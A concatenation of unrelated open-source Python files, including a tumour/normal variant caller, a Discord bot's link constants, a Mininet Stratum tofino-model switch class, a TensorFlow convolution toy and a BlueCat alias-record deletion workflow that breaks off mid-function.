def check_coverage_thresh(cov, pos, num_of_samples):
    """Return 1 when every sample reaches min_cov at *pos*, else 0."""
    deep_enough = all(cov[s][pos] >= min_cov for s in range(num_of_samples))
    return 1 if deep_enough else 0
def active_region(cov, mut, pos, num_of_samples, verbose):
    """Return the first background p-value below threshold at *pos*, else 1.

    For each covered sample (scanned in order) the expected noise is
    cov * noise and the observed mutant count is tested against it with a
    Poisson CDF; the first p-value under background_p_thresh short-circuits
    the scan.  *verbose* is accepted for interface compatibility but unused.
    """
    for sample in range(num_of_samples):
        depth = cov[sample][pos]
        if depth <= 0:
            continue
        p_val = poisson.cdf(depth * noise, mut[sample][pos])
        if p_val < background_p_thresh:
            return p_val
    return 1
def calculate_region_pvalues(pos, num_of_samples, b_a, ref_segment, m_end, mut, cov, st):
    """Per-sample, per-allele background p-values at *pos*.

    The expected noise at *pos* is estimated from low-frequency (< 5%)
    mismatches within +/- region_interval bases, scaled to the sample's
    coverage at *pos*, plus the global per-base error rate.  Each of the
    four allele counts is then tested against that expectation with a
    Poisson CDF; the reference allele is forced to p = 1.0.
    Returns ([[pA, pC, pG, pT] per sample], minimum p over all cells).
    NOTE(review): parameter *st* (the caller passes g_m_start) is unused.
    """
    background_probs = list()
    # clamp the window to [0, m_end), preserving its width where possible
    region_start = pos - region_interval
    region_end = pos + region_interval + 1
    min_p = 1
    if region_start < 0:
        region_end += (-1) * region_start
        region_start = 0
    if region_end > m_end:
        region_start -= region_end - m_end
        region_end = m_end
    for j in range(0, num_of_samples):
        region_noise = 0
        noise_sum = 0
        num_of_bases = 0
        region_mean_cov = 0
        region_mean_mut = 0
        for i in range(region_start, region_end):
            # only low-frequency mismatches away from *pos* count as noise
            if mut[j][i] > 0 and i != pos and mut[j][i] / cov[j][i] < 0.05:
                region_noise += mut[j][i]
                noise_sum += cov[j][i]
                num_of_bases += 1
        if region_noise > 0 and num_of_bases > 0:
            region_mean_cov = noise_sum / num_of_bases
            region_mean_mut = region_noise / num_of_bases
            region_noise = (region_mean_mut/region_mean_cov) * cov[j][pos] + noise * cov[j][pos]
        else:
            # no usable neighbourhood: fall back to the global error rate
            region_noise = noise * cov[j][pos]
        background_probs.append([poisson.cdf(region_noise, b_a[j][0][pos]), poisson.cdf(region_noise, b_a[j][1][pos]), poisson.cdf(region_noise, b_a[j][2][pos]), poisson.cdf(region_noise, b_a[j][3][pos])])
        background_probs[-1][base[ref_segment[pos]]] = 1.0
        for i in range(0, 4):
            if background_probs[-1][i] < min_p:
                min_p = background_probs[-1][i]
    return background_probs, min_p
def calculate_strand_and_qual_probs(pos, num_of_samples, f_q_m, r_q_m, ref_segment, background_probs):
    """Strand-balance and base-quality bias tests at *pos* for each sample.

    strand_probs[j] = [overall strand-balance p, per-allele p x4] from
    Fisher's exact test against the sample's forward/reverse totals;
    qual_probs[j]  = per-allele Poisson p comparing the allele's mean base
    quality to the position's overall mean (only computed for alleles whose
    background p is already < 0.05).
    NOTE(review): the expression (k - k/q_max * q_max) recovers k mod q_max
    only under Python 2 integer division — this module relies on Python 2.
    """
    strand_probs = list()
    qual_probs = list()
    for j in range(0, num_of_samples):
        # start sums at 1 to avoid zero divisions / degenerate tables
        forward_sum, reverse_sum, f_q_sum, r_q_sum = 1, 1, 1, 1
        strand_probs.append([1, 1, 1, 1, 1])
        qual_probs.append([1, 1, 1, 1, 1])
        qual_sums = 0
        for k in range(0, q_m_height):
            forward_sum += f_q_m[j][k][pos]
            reverse_sum += r_q_m[j][k][pos]
            if f_q_m[j][k][pos] > 0:
                qual_sums += f_q_m[j][k][pos] * (k - k/q_max * q_max)
            if r_q_m[j][k][pos] > 0:
                qual_sums += r_q_m[j][k][pos] * (k - k/q_max * q_max)
        # overall strand balance vs. an ideal 50/50 split
        strand_probs[-1][0] = fisher_exact([[(forward_sum+reverse_sum)/2, (forward_sum+reverse_sum)/2], [forward_sum, reverse_sum]])[1]
        qual_sums = qual_sums / (forward_sum + reverse_sum)
        for k in range(0, 4):
            if background_probs[j][k] < 0.05:
                local_forward_sum = 0
                local_reverse_sum = 0
                # rows k*q_max .. (k+1)*q_max-1 belong to allele k
                for l in range(k*q_max, (k+1)*q_max):
                    local_forward_sum += f_q_m[j][l][pos]
                    local_reverse_sum += r_q_m[j][l][pos]
                    if f_q_m[j][l][pos] > 0:
                        qual_probs[-1][k] += f_q_m[j][l][pos] * (l - l/q_max * q_max)
                    if r_q_m[j][l][pos] > 0:
                        qual_probs[-1][k] += r_q_m[j][l][pos] * (l - l/q_max * q_max)
                if local_forward_sum > 0 or local_reverse_sum > 0:
                    strand_probs[-1][k+1] = fisher_exact([[local_forward_sum, local_reverse_sum], [forward_sum, reverse_sum]])[1]
                    qual_probs[-1][k] = poisson.cdf(qual_probs[-1][k]/(local_forward_sum + local_reverse_sum), qual_sums)
                else:
                    qual_probs[-1][k] = 1
    return strand_probs, qual_probs
def get_region(bed_input):
    """Call germline and somatic variants (SNVs and indels) in one BED row.

    bed_input is a [chrom, start, end, ...] list of strings.  The first BAM
    in bamlist is treated as the matched normal sample, the rest as tumour
    samples.  Calls are appended to the module-level mutation table and the
    processed BED row is logged to the progress file.
    """
    in_chr = bed_input[0]
    start = int(bed_input[1])
    end = int(bed_input[2])
    end = end + 1
    if in_chr not in records:
        return
    # Pad the window: 1000 bp of left context for noise estimation and
    # 100 bp on the right so proximal lookups cannot run off the arrays.
    g_m_start = start - 1000
    g_m_end = end
    ref_segment = records[in_chr].seq[g_m_start:g_m_end+100].upper()
    m_end = end - g_m_start + 100
    # Per-sample matrices: forward/reverse quality histograms, per-base
    # counts, coverage, mutant counts and indel counts per position.
    f_q_m = list()
    r_q_m = list()
    b_a = list()
    cov = list()
    mut = list()
    reads = [[] for x in xrange(num_of_samples)]
    mismatch = [0]*m_end
    indarray = list()
    active_pos = dict()
    indels = dict()
    for i in range(0, num_of_samples):
        f_q_m.append(numpy.zeros((q_m_height, m_end), dtype=numpy.int))
        r_q_m.append(numpy.zeros((q_m_height, m_end), dtype=numpy.int))
        b_a.append(numpy.zeros((4, m_end+100), dtype=numpy.int))
        cov.append(numpy.zeros((m_end), dtype=numpy.int))
        indarray.append(numpy.zeros((m_end), dtype=numpy.int))
        mut.append(numpy.zeros((m_end), dtype=numpy.int))
    # First pass: collect acceptable reads and the shared mismatch profile.
    for i in range(0, num_of_samples):
        r_bam = pysam.AlignmentFile(bamlist[i], "rb")
        reads[i], mismatch = import_reads(in_chr, start, end, r_bam, g_m_start, m_end, mismatch, reads[i])
        r_bam.close()
    # Second pass: fill each sample's count matrices.
    for i in range(0, num_of_samples):
        cov[i], b_a[i], r_q_m[i], f_q_m[i], mut[i], active_pos, indels, indarray[i] = import_data(reads[i], cov[i], b_a[i], r_q_m[i], f_q_m[i], mut[i], in_chr, g_m_start, m_end, active_pos, indels, i, indarray[i], mismatch)
    if input_coords == 0:
        active_coords = active_pos.keys()
        active_coords.sort()
    else:
        # BED rows are exact mutation coordinates: inspect only that base.
        active_coords = [start-g_m_start-1]
    for i in active_coords:
        ref_base = ref_segment[i]
        # ---------------- indel calling ----------------
        if i in indels:
            for key in indels[i].keys():
                ind_cov = [0] * num_of_samples
                ind_freq = [0] * num_of_samples
                ind_forw = [0] * num_of_samples
                ind_rev = [0] * num_of_samples
                ind_quals = [0] * num_of_samples
                qual_sums = [0] * num_of_samples
                forward_sums = [0] * num_of_samples
                reverse_sums = [0] * num_of_samples
                indel_probs = [1] * num_of_samples
                indel_norm_qual = [0] * num_of_samples
                norm_qual = [0] * num_of_samples
                qual_bias = [1] * num_of_samples
                strand_bias = [1] * num_of_samples
                indel_result = list()
                # tally supporting reads per sample / strand / quality
                for els in indels[i][key]:
                    if els[0] <= num_of_samples:
                        ind_cov[els[0]] += 1
                        if els[2] == 0:
                            ind_forw[els[0]] += 1
                        else:
                            ind_rev[els[0]] += 1
                        ind_quals[els[0]] += els[1]
                for j in range(0, num_of_samples):
                    if ind_cov[j] > 0 and cov[j][i] > 0:
                        ind_freq[j] = ind_cov[j] * 100 / cov[j][i]
                # position-wide strand and quality totals per sample
                for j in range(0, num_of_samples):
                    for k in range(0, q_m_height):
                        forward_sums[j] += f_q_m[j][k][i]
                        reverse_sums[j] += r_q_m[j][k][i]
                        if f_q_m[j][k][i] > 0:
                            qual_sums[j] += f_q_m[j][k][i] * (k - k/q_max * q_max)
                        if r_q_m[j][k][i] > 0:
                            qual_sums[j] += r_q_m[j][k][i] * (k - k/q_max * q_max)
                for j in range(0, num_of_samples):
                    if cov[j][i] > 0:
                        norm_qual[j] = qual_sums[j] / cov[j][i]
                    if ind_cov[j] > 1:
                        indel_probs[j] = poisson.cdf(int(cov[j][i] * indel_noise_freq), ind_cov[j])
                        indel_norm_qual[j] = ind_quals[j] / ind_cov[j]
                for j in range(0, num_of_samples):
                    if indel_norm_qual[j] > 0 and norm_qual[j] > 0:
                        qual_bias[j] = poisson.cdf(indel_norm_qual[j], norm_qual[j])
                    # fix: the original tested the whole list (ind_cov > 0),
                    # which is always true in Python 2; test this sample only
                    if ind_cov[j] > 0:
                        strand_bias[j] = fisher_exact([[ind_forw[j], ind_rev[j]],[forward_sums[j], reverse_sums[j]]])[1]
                for j in range(0, num_of_samples):
                    indel_result.append(str(cov[j][i]) + ";" + str(ind_cov[j]) + "," + str(ind_forw[j]) +";" + str(ind_rev[j]) + "," + str(forward_sums[j]) + ";" + str(reverse_sums[j]) + "," + str("%.2g" % indel_probs[j]) + "," + str("%.2g" % qual_bias[j]) + "," + str("%.2g" % strand_bias[j]))
                accept = 0
                if indel_probs[0] < 0.05:
                    # significant in the normal sample -> germline indel
                    if ind_freq[0] > 5 and ind_cov[0] > 4:
                        accept = 1
                    mutationhandle.write("%s\t%d\t%s\tgermline\t%d\t%s\n" % (in_chr, els[3] + g_m_start, key, accept, "\t".join(indel_result)))
                else:
                    if min(indel_probs[1:num_of_samples]) < 0.05:
                        s_accept = 1
                        if max(qual_bias[1:num_of_samples]) < 0.05:
                            # fix: was misspelled 's_accpet', which silently
                            # disabled the quality-bias filter
                            s_accept = 0
                        if cov[0][i] < filter_coverage:
                            # low-coverage normal: any supporting read vetoes
                            if ind_cov[0] > 0:
                                s_accept = 0
                        else:
                            if ind_cov[0] > normal_mut_thresh:
                                s_accept = 0
                        if max(ind_freq[1:num_of_samples]) < freq_filter_high_cov:
                            s_accept = 0
                        if max(ind_cov[1:num_of_samples]) < minimum_indel_mut:
                            s_accept = 0
                        if s_accept == 1:
                            accept = 1
                        if cov[0][i] < min_norm_cov:
                            accept = 0
                        mutationhandle.write("%s\t%d\t%s\tsomatic\t%d\t%s\n" % (in_chr, els[3] + g_m_start, key, accept, "\t".join(indel_result)))
        # ---------------- SNV calling ----------------
        if ref_base in base:
            background_probs, min_p = calculate_region_pvalues(i, num_of_samples, b_a, ref_segment, m_end, mut, cov, g_m_start)
            background_p = active_region(cov, mut, i, num_of_samples, 0)
            if background_p < 0.05 or min_p < 0.05:
                strand_probs, qual_probs = calculate_strand_and_qual_probs(i, num_of_samples, f_q_m, r_q_m, ref_segment, background_probs)
                somatic = list()
                germline = list()
                sample_results = list()
                for j in range(0, num_of_samples):
                    sample_results.append( str(cov[j][i])+";"+",".join(str(b_a[j][y][i]) for y in range(0, 4)) + ";" + ','.join(str("%.2g" % x) for x in background_probs[j]) + ";" + ':'.join(str("%.2g" % x) for x in strand_probs[j]) + ";" + ','.join(str("%.2g" % x) for x in qual_probs[j]))
                sample_results = '\t'.join(str(x) for x in sample_results)
                # alleles significant in the normal sample are germline
                for j in range(0, 4):
                    if background_probs[0][j] < 0.05 and j != base[ref_base]:
                        germline.append(j)
                # alleles significant in any tumour, not already germline,
                # are somatic candidates
                for j in range(0, 4):
                    local_mut = 0
                    for k in range(1, num_of_samples):
                        if background_probs[k][j] < 0.05 and j != base[ref_base]:
                            local_mut = 1
                    if local_mut == 1 and j != base[ref_base]:
                        in_germline = 0
                        for l in range(0,len(germline)):
                            if germline[l] == j:
                                in_germline = 1
                        if in_germline == 0:
                            somatic.append(j)
                if len(germline) > 0:
                    mut_type = "germline"
                    if len(germline) > 1:
                        mut_type = "germline_multi"
                    for j in range(0, len(germline)):
                        # accept germline calls with >4 reads and >5% frequency
                        if b_a[0][germline[j]][i] > 4 and b_a[0][germline[j]][i] * 100 / cov[0][i] > 5:
                            mutationhandle.write("%s\t%d\t%c\t%c\t%s\t1\t%s\n" % (in_chr, i + g_m_start + 1, ref_base, rb[germline[j]], mut_type, sample_results))
                        else:
                            mutationhandle.write("%s\t%d\t%c\t%c\t%s\t0\t%s\n" % (in_chr, i + g_m_start + 1, ref_base, rb[germline[j]], mut_type, sample_results))
                if len(somatic) > 0:
                    mut_type = "somatic"
                    if len(somatic) > 1:
                        mut_type = "somatic_multi"
                    for j in range(0, len(somatic)):
                        accept = 0
                        # accept if ANY tumour sample passes all filters
                        for k in range(1, num_of_samples):
                            s_accept = 1
                            if cov[k][i] > 0:
                                if qual_probs[k][somatic[j]] < 0.05:
                                    s_accept = 0
                                if cov[k][i] < filter_coverage:
                                    if b_a[0][somatic[j]][i] > 0:
                                        s_accept = 0
                                else:
                                    if b_a[0][somatic[j]][i] > normal_mut_thresh:
                                        s_accept = 0
                                if b_a[k][somatic[j]][i]*100/cov[k][i] < freq_filter_high_cov:
                                    s_accept = 0
                                if b_a[k][somatic[j]][i] < min_somatic_mut:
                                    if b_a[k][somatic[j]][i]*100/cov[k][i] < freq_thresh:
                                        s_accept = 0
                                if proximal_indel_filter == 1:
                                    if max(indarray[k][i-prox_indel_dist:i+prox_indel_dist]) >= prox_indel_mut_count:
                                        s_accept = 0
                            else:
                                s_accept = 0
                            if s_accept == 1:
                                accept = 1
                        if min_norm_cov > cov[0][i]:
                            accept = 0
                        mutationhandle.write("%s\t%d\t%c\t%c\tsomatic\t%d\t%s\n" % (in_chr, i + g_m_start + 1, ref_base, rb[somatic[j]], accept, sample_results))
    # log the finished BED row for progress tracking
    tbed = "\t".join(bed_input)
    print (tbed)
    bedloghandle.write("%s\n" % (tbed))
# Driver: one get_region() call per tab-separated BED row, then close logs.
bedfile = open(options.bed, "r")
genes = [line.rstrip().split('\t') for line in bedfile]
for k in genes:
    get_region(k)
mutationhandle.close()
bedloghandle.close()
| StarcoderdataPython |
# Shared link constants used by the bot's commands.
# Ednaldo Pereira "banned" / "unbanned" meme GIFs.
banido = 'https://tenor.com/view/ednaldo-pereira-banido-desbanido-meme-meme-banido-gif-19429642'
desbanido = 'https://tenor.com/view/desbanido-ednaldo-pereira-ednaldo-pereira-banido-gif-19443137'
# Project repository and its README.
repositorio = 'https://github.com/Eduardo-Barreto/Marselo-Bot'
readme = 'https://github.com/Eduardo-Barreto/Marselo-Bot/blob/master/README.md'
# Classic rickroll video link.
rickrolling = 'https://youtu.be/dQw4w9WgXcQ'
# Spotify playlist and the school's virtual-classroom calendar.
playlist = 'https://open.spotify.com/playlist/0TWxX4f5AiAfE4FVFj8Vcq?si=d79e763e368743f2'
conexao_digital = 'https://conexaodigital2em.sesisp.org.br/calendar/view.php?view=month'
| StarcoderdataPython |
9622401 | <reponame>carpedkm/vedatad
from vedacore.misc import registry
from .base_hook import BaseHook
@registry.register_module('hook')
class WorkerInitHook(BaseHook):
    """Keep dataloader worker seeding in sync with the current epoch.

    If the train dataloader's worker_init_fn exposes set_epoch(), it is
    called with the looper's epoch before each training epoch starts.
    """

    def before_train_epoch(self, looper):
        init_fn = looper.train_dataloader.worker_init_fn
        if init_fn is None:
            return
        if hasattr(init_fn, 'set_epoch'):
            init_fn.set_epoch(looper.epoch)

    @property
    def modes(self):
        # This hook only participates in training.
        return ['train']
| StarcoderdataPython |
6524710 | # coding=utf-8
# Copyright 2018-present Open Networking Foundation
# SPDX-License-Identifier: Apache-2.0
'''
This module contains a switch class for Mininet: StratumTofinoModel
Usage
-----
From withing the Docker container, you can run Mininet using the following:
$ mn --custom tools/mininet/tofino-model.py --switch stratum-t-model --link tofino
'''
import json
import multiprocessing
import os
import socket
import threading
import time
from mininet.log import warn
from mininet.node import Switch, Host
from mininet.link import Link
# Binaries expected on PATH inside the Stratum container.
TOFINO_MODEL_BIN = 'tofino-model'
STRATUM_BIN = 'stratum_bf'
# DEV_STRATUM_BIN = '/root/stratum/bazel-bin/stratum/hal/bin/barefoot/stratum_bf'
def watchdog(sw):
    """Background monitor thread for a StratumTofinoModel switch.

    Creates the switch's keepalive file, then polls once a second and
    shuts the switch down when (a) Mininet signalled a global exception,
    (b) the keepalive file was removed, or (c) either child process died.
    """
    try:
        with open(sw.keepalive, "w") as f:
            f.write(f"Remove this file to terminate {sw.name}")
        while True:
            # mininet_exception starts life as a multiprocessing.Value and
            # is rebound to the plain int 1 on failure, making this test true.
            if StratumTofinoModel.mininet_exception == 1 \
                    or not os.path.isfile(sw.keepalive):
                sw.stop()
                return
            if sw.stopped:
                return
            # protect against already crashed process, will be none and fail to poll()
            # fix: the original read sw.modelProc_h / sw.stratumProc_h,
            # attributes that are never defined on the switch class
            if sw.modelProcHandle is not None and sw.stratumProcHandle is not None:
                # poll() returns None while the child is still running
                if sw.modelProcHandle.poll() is None and sw.stratumProcHandle.poll() is None:
                    time.sleep(1)
                else:
                    warn("\n*** WARN: switch %s died ☠️ \n" % sw.name)
                    sw.stop()
                    return
    except Exception as e:
        # fix: Exception.message does not exist on Python 3
        warn("*** ERROR: " + str(e))
        sw.stop()
class StratumTofinoModel(Switch):
    """Mininet switch backed by a tofino-model + stratum_bf process pair.

    Each instance owns a private /tmp/<name> directory holding its chassis
    config, port/veth map and per-process logs, and is supervised by a
    watchdog thread that tears everything down if either process dies.
    """

    # Rebound to the int 1 when any instance fails to start; watchdog
    # threads poll it so every switch shuts down on a global failure.
    mininet_exception = multiprocessing.Value('i', 0)
    nextNodeId = 0

    def __init__(self, name, inNamespace=True,
                 sdeInstall="/root/sde/install",
                 bfSwitchdConfig="/etc/stratum/tofino_skip_p4.conf", **kwargs):
        Switch.__init__(self, name, inNamespace=True, **kwargs)
        self.sdeInstall = sdeInstall
        self.bfSwitchdConfig = bfSwitchdConfig
        # Node ids are spaced by 64 so per-switch port ids never collide.
        self.nodeId = StratumTofinoModel.nextNodeId * 64
        StratumTofinoModel.nextNodeId += 1
        self.tmpDir = '/tmp/%s' % self.name
        self.chassisConfigFile = '%s/chassis-config.txt' % self.tmpDir
        self.portVethFile = '%s/ports.json' % self.tmpDir
        # process handles for tofino model and stratum
        self.modelProcHandle = None
        self.stratumProcHandle = None
        # fix: initialise log handles here so tryTerminate() is safe even
        # when stop() is reached before start() ever ran
        self.modelLogHandle = None
        self.stratumLogHandle = None
        # True while the switch is not running.
        self.stopped = True
        # In case of exceptions, mininet removes *.out files from /tmp. We use
        # this as a signal to terminate the switch instance (if active).
        self.keepalive = '/tmp/%s-watchdog.out' % self.name
        # Remove files from previous executions
        self.cmd("rm -rf %s" % self.tmpDir)
        os.mkdir(self.tmpDir)

    def stop(self, deleteIntfs=True):
        """Terminate switch."""
        self.stopped = True
        if self.anyProcHandleLive():
            self.tryTerminate()
        self.modelProcHandle = None
        self.stratumProcHandle = None
        Switch.stop(self, deleteIntfs)

    def start(self, controllers):
        """Launch tofino-model and stratum_bf; no-op if already running."""
        if not self.stopped:
            return
        # Bring up loopback inside the namespace before the processes start.
        self.cmd("/usr/sbin/ip l set dev lo up")
        with open(self.chassisConfigFile, 'w') as fp:
            fp.write(self.getChassisConfig())
        with open(self.portVethFile, 'w') as fp:
            fp.write(self.getPortVethMap())
        tof_cmd_string = " ".join(
            [
                TOFINO_MODEL_BIN,
                f'--p4-target-config={self.bfSwitchdConfig}',
                f'-f{self.portVethFile}'
            ]
        )
        stratum_cmd_string = " ".join(
            [
                STRATUM_BIN,
                f'-chassis_config_file={self.chassisConfigFile}',
                '-enable_onlp=false',
                '-bf_switchd_background=false',
                '-v=2',
                f'-bf_sde_install={self.sdeInstall}',
                f'-bf_switchd_cfg={self.bfSwitchdConfig}',
            ]
        )
        try:
            # Write cmd_string to log for debugging.
            self.modelLogHandle = open(f'{self.tmpDir}/tofino_model_process.log', "w")
            self.modelLogHandle.write(tof_cmd_string + "\n\n" + "-" * 80 + "\n\n")
            self.modelLogHandle.flush()
            self.stratumLogHandle = open(f'{self.tmpDir}/stratum_process.log', "w")
            self.stratumLogHandle.write(stratum_cmd_string + "\n\n" + "-" * 80 + "\n\n")
            self.stratumLogHandle.flush()
            # fix: the originals redirected child stdio to self.t_logfd /
            # self.s_logfd, attributes that were never defined; use the log
            # handles opened just above instead
            self.modelProcHandle = self.popen(tof_cmd_string,
                                              stdout=self.modelLogHandle,
                                              stderr=self.modelLogHandle)
            self.stratumProcHandle = self.popen(stratum_cmd_string,
                                                stdout=self.stratumLogHandle,
                                                stderr=self.stratumLogHandle)
            # We want to be notified if processes quits prematurely...
            self.stopped = False
            threading.Thread(target=watchdog, args=[self]).start()
        except Exception:
            StratumTofinoModel.mininet_exception = 1
            self.stop()
            raise

    def getPortVethMap(self):
        """Return the tofino-model ports JSON mapping device ports to veths."""
        intf_number = 1
        portsVeth = list()
        for intf_name in self.intfNames():
            if intf_name == 'lo':
                continue
            # Interface names are 'veth<N>'; the model pairs vethN / vethN+100.
            portsVeth.append(
                {
                    "device_port": intf_number,
                    "veth1": int(intf_name[4:]),
                    "veth2": int(intf_name[4:]) + 100
                }
            )
            intf_number += 1
        data = {"PortToVeth": portsVeth}
        return json.dumps(data, indent=4) + "\n"

    def getChassisConfig(self):
        """Render the Stratum chassis config text for this switch."""
        config = """description: "chassis config bf tofino model {name}"
chassis {{
platform: PLT_GENERIC_BAREFOOT_TOFINO
name: "{name}"
}}
nodes {{
id: {nodeId}
name: "{name}"
slot: 1
index: 1
}}\n""".format(name=self.name, nodeId=self.nodeId)
        # One singleton_port entry per non-loopback interface.
        intf_number = 1
        for intf_name in self.intfNames():
            if intf_name == 'lo':
                continue
            config = config + """singleton_ports {{
id: {intfNumber}
name: "{intfName}"
slot: 1
port: {intfNumber}
channel: 1
speed_bps: 10000000000
config_params {{
admin_state: ADMIN_STATE_ENABLED
}}
node: {nodeId}
}}\n""".format(intfName=intf_name, intfNumber=intf_number, nodeId=self.nodeId)
            intf_number += 1
        return config

    def anyProcHandleLive(self):
        """Return True when at least one child process handle is still set."""
        return self.modelProcHandle is not None or self.stratumProcHandle is not None

    def tryTerminate(self):
        """Terminate still-running child processes and close their logs."""
        if self.modelProcHandle is not None:
            if self.modelProcHandle.poll() is None:
                self.modelProcHandle.terminate()
                self.modelProcHandle.wait()
        # fix: the original tested self.stratumProc_h (never defined) while
        # polling self.stratumProcHandle; use the real attribute throughout
        if self.stratumProcHandle is not None:
            if self.stratumProcHandle.poll() is None:
                self.stratumProcHandle.terminate()
                self.stratumProcHandle.wait()
        if self.modelLogHandle is not None:
            self.modelLogHandle.close()
            self.modelLogHandle = None
        if self.stratumLogHandle is not None:
            self.stratumLogHandle.close()
            self.stratumLogHandle = None
class NoOffloadHost(Host):
    """Mininet host whose default interface has NIC offloads disabled."""

    def __init__(self, name, inNamespace=True, **params):
        Host.__init__(self, name, inNamespace=inNamespace, **params)

    def config(self, **params):
        # NOTE(review): this deliberately mirrors the original and calls
        # super(Host, ...), i.e. it skips Host.config and runs the
        # grandparent's — confirm against upstream before changing.
        r = super(Host, self).config(**params)
        # Turn off rx/tx checksum and scatter-gather offload so packets
        # on the wire match what the switch datapath expects.
        for feature in ("rx", "tx", "sg"):
            self.cmd("/sbin/ethtool --offload %s %s off"
                     % (self.defaultIntf(), feature))
        return r
class TofinoLink(Link):
    """Link that names switch-side interfaces veth<N> (tofino numbering)."""

    def __init__(self, *args, **kwargs):
        Link.__init__(self, *args, **kwargs)

    def intfName(self, node, n):
        """Return the interface name for port *n* on *node*."""
        # Hosts carry no nodeId, so they keep the standard mininet scheme.
        if isinstance(node, Host):
            return "{}-eth{}".format(node.name, repr(n))
        return "veth%d" % (node.nodeId - 1 + n)
# Exports for bin/mn
# Names usable from the mn CLI via --switch / --host / --link.
switches = {'stratum-t-model': StratumTofinoModel}
hosts = {'no-offload-host': NoOffloadHost}
LINKS = { 'default': Link, # Note: overridden below
          # 'tc': TCLink,
          # 'tcu': TCULink,
          # 'ovs': OVSLink,
          'tofino': TofinoLink}
| StarcoderdataPython |
5109565 | #-----------------------------------------------------------------------------
# Copyright (c) 2018 <NAME>, <NAME>, <NAME>
# danielhn<at>ece.ubc.ca
#
# Permission to use, copy, and modify this software and its documentation is
# hereby granted only under the following terms and conditions. Both the
# above copyright notice and this permission notice must appear in all copies
# of the software, derivative works or modified versions, and any portions
# thereof, and both notices must appear in supporting documentation.
# This software may be distributed (but not offered for sale or transferred
# for compensation) to third parties, provided such third parties agree to
# abide by the terms and conditions of this notice.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHORS, AS WELL AS THE UNIVERSITY
# OF BRITISH COLUMBIA DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO
# EVENT SHALL THE AUTHORS OR THE UNIVERSITY OF BRITISH COLUMBIA BE LIABLE
# FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR
# IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#---------------------------------------------------------------------------
import tensorflow as tf
import numpy as np
import string
# Toy TensorFlow 1.x experiment (Python 2 print syntax): push a 5x5
# single-channel input through two stacked 3x3 SAME-padded convolutions
# with hand-picked weights and print every intermediate tensor.
size = 5        # spatial height/width of the square input
outputs = 2     # output channels of each conv layer
X = tf.placeholder(tf.float32, [1, size,size,1])
weights = tf.placeholder(tf.float32, [3,3,1,outputs])
w1 = tf.placeholder(tf.float32, [3,3,2,outputs])
# Flattened hand-written input image and the two convolution kernels.
x=[1,0,1,1,-1,1,1,0,-1,0,1,0,0,-1,0,1,0,1,1,-1,-1,0,-1,1,1]
w11=[1,-1,1,0,0,0,1,0,0,1,0,-1,0,1,1,0,0,-1]
w2=[1,-1,1,0,0,0,1,-1,1,0,0,0,1,-1,1,0,0,0,0,1,1,0,0,-1,0,1,1,0,0,-1,1,0,0,1,-1,0]
# Reshape to NHWC / HWIO layouts expected by tf.nn.conv2d.
in_x=np.reshape(np.array(x).transpose(),[1,size,size,1])
in_weights = np.reshape(np.array(w11).transpose(),[3,3,1,outputs])
in_w1 = np.reshape(np.array(w2).transpose(),[3,3,2,outputs])
print in_x.reshape(1,5,5,1)
print "======="
print in_weights.reshape(3,3,1,2)
print "======="
print in_w1.reshape(3,3,2,2)
print "======="
# First conv: 1 -> 2 channels; second conv: 2 -> 2 channels.
y1 = tf.nn.conv2d(X, weights, strides=[1, 1, 1, 1], padding='SAME')
y = tf.nn.conv2d(y1, w1, strides=[1, 1, 1, 1], padding='SAME')
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    r1 = sess.run(y1, feed_dict={X: in_x, weights: in_weights})
    result = sess.run(y, feed_dict={X: in_x, weights: in_weights, w1: in_w1})
    print r1.reshape(1,size,size,2)
    print "======="
    print result.reshape(1,size,size,2)
| StarcoderdataPython |
6553905 | <filename>Examples/Alias Record/delete_alias_record_example/delete_alias_record_example_page.py
# Copyright 2017 BlueCat Networks. All rights reserved.
# Various Flask framework items.
import os
import sys
from flask import url_for, redirect, render_template, flash, g, request
from bluecat import route, util
import config.default_config as config
from main_app import app
from .delete_alias_record_example_form import GenericFormTemplate
def module_path():
    """Return the absolute directory containing this module."""
    # NOTE(review): `unicode` exists only on Python 2 — this raises
    # NameError on Python 3. Confirm the target interpreter.
    encoding = sys.getfilesystemencoding()
    return os.path.dirname(os.path.abspath(unicode(__file__, encoding)))
# The workflow name must be the first part of any endpoints defined in this file.
# If you break this rule, you will trip up on other people's endpoint names and
# chaos will ensue.
@route(app, '/delete_alias_record_example/delete_alias_record_example_endpoint')
@util.workflow_permission_required('delete_alias_record_example_page')
@util.exception_catcher
def delete_alias_record_example_delete_alias_record_example_page():
    """Render the delete-alias-record form (GET entry point)."""
    form = GenericFormTemplate()
    # Remove this line if your workflow does not need to select a configuration
    form.configuration.choices = util.get_configurations(default_val=True)
    return render_template('delete_alias_record_example_page.html', form=form, text=util.get_text(module_path(), config.language),
                           options=g.user.get_options())
@route(app, '/delete_alias_record_example/form', methods=['POST'])
@util.workflow_permission_required('delete_alias_record_example_page')
@util.exception_catcher
def delete_alias_record_example_delete_alias_record_example_page_form():
    """Handle the POSTed form: delete the selected alias record.

    Looks up the record as '<alias_record>.<zone>' in the chosen view,
    deletes it, and redirects back to the form page on success; any
    failure is flashed and re-renders the page.
    """
    form = GenericFormTemplate()
    # Remove this line if your workflow does not need to select a configuration
    form.configuration.choices = util.get_configurations(default_val=True)
    if form.validate_on_submit():
        try:
            # Retrieve form attributes and declare variables
            configuration = g.user.get_api().get_entity_by_id(form.configuration.data)
            view = configuration.get_view(request.form['view'])

            # Retrieve alias record (FQDN = record name + '.' + zone)
            alias_record = view.get_alias_record(request.form['alias_record'] + '.' + request.form['zone'])

            # Retrieve alias_record attributes for flash message
            # (read BEFORE delete — the object is gone afterwards)
            alias_name = alias_record.get_name()
            alias_id = util.safe_str(alias_record.get_id())

            # Delete alias record
            alias_record.delete()

            # Put form processing code here
            g.user.logger.info('Success - Alias Record ' + alias_name + ' Deleted with Object ID: ' + alias_id)
            flash('Success - Alias Record ' + alias_name + ' Deleted with Object ID: ' + alias_id, 'succeed')
            # NOTE(review): endpoint name below looks auto-generated
